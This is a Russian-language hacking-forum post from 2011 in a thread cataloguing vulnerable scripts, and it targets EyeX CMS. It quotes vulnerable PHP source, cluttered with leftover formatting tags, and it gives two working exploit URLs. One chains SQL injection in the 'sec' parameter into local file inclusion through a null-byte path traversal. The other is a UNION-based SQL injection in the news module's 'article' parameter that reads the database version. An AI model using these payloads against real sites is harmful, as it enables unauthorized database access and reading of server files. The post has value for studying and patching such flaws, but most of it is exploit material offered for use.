Тема: Энциклопедия уязвимых скриптов
Показать сообщение отдельно

  #2  
Старый 01.03.2011, 03:31
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
EyeX CMS

http://sourceforge.net/projects/eyex/

SQLi / LFI

Need:

mq=off

index.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec'[/COLOR][COLOR="#007700"]];

if(empty([/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"])){[/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec'[/COLOR][COLOR="#007700"]]; }

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]if(empty([/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]}

}else{

[/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT mod_status, mod_folder FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_CPBD[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_mods WHERE mod_folder='[/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"]);

list([/COLOR][COLOR="#0000BB"]$mod_status[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]sql_cls[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"])){

if([/COLOR][COLOR="#0000BB"]is_admin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"])){

 include([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"]);

}else{

 if([/COLOR][COLOR="#0000BB"]$mod_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"]){

 include([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"]);

 }else{

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: error.php?code=NOACTIVE"[/COLOR][COLOR="#007700"]);

 }

}

}else{

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: error.php?code=NOMOD"[/COLOR][COLOR="#007700"]);

}

}

[/COLOR][/COLOR
/system/sql_functions.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_QUERY"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_query"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_FETCH"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_fetch_row"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_NROWS"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_numrows"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_QUERY[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_FETCH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$dbnum[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_NROWS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][/COLOR
Ну думаю тут все ясно, полученный результат из выборки инклюдится.

Эксплуатация:

Код:
Code:
http://localhost/eyexcms/index.php?sec=assdas'+union+select+1,'../../readme.txt%00'-- 1
SQLi

Need:

mq=off

/Addons/mods/news/main.php

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'st'[/COLOR][COLOR="#007700"]];

if(empty([/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'st'[/COLOR][COLOR="#007700"]];

}

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]ReadStory[/COLOR][COLOR="#007700"](){

global[/COLOR][COLOR="#0000BB"]$bgtable[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbnum[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$bgtable[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'article'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]ROhead[/COLOR][COLOR="#007700"]();

if(empty([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]wmsg[/COLOR][COLOR="#007700"]();

}

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT nid, ntitle, ntext, ndate, nautor, topic FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_CPBD[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_news WHERE nid='[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"]);

list([/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntext[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ndate[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$nautor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]change_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$nautor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntext[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ndate[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]comentarios[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]ROfoot[/COLOR][COLOR="#007700"]();

[/COLOR][COLOR="#0000BB"]sql_cls[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);

}

[/COLOR][COLOR="#FF8000"]//...

[/COLOR][COLOR="#007700"]switch([/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]){

case[/COLOR][COLOR="#DD0000"]"ReadStory"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]ReadStory[/COLOR][COLOR="#007700"]();break;

case[/COLOR][COLOR="#DD0000"]"SaveComment"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]SaveComment[/COLOR][COLOR="#007700"]();break;

default:[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]();break;

}

[/COLOR][/COLOR
Эксплуатация:

Код:
Code:
http://localhost/eyexcms/index.php?sec=news&st=ReadStory&article=-1'+union+select+1,version(),3,4,5,6-- 1
 
Ответить с цитированием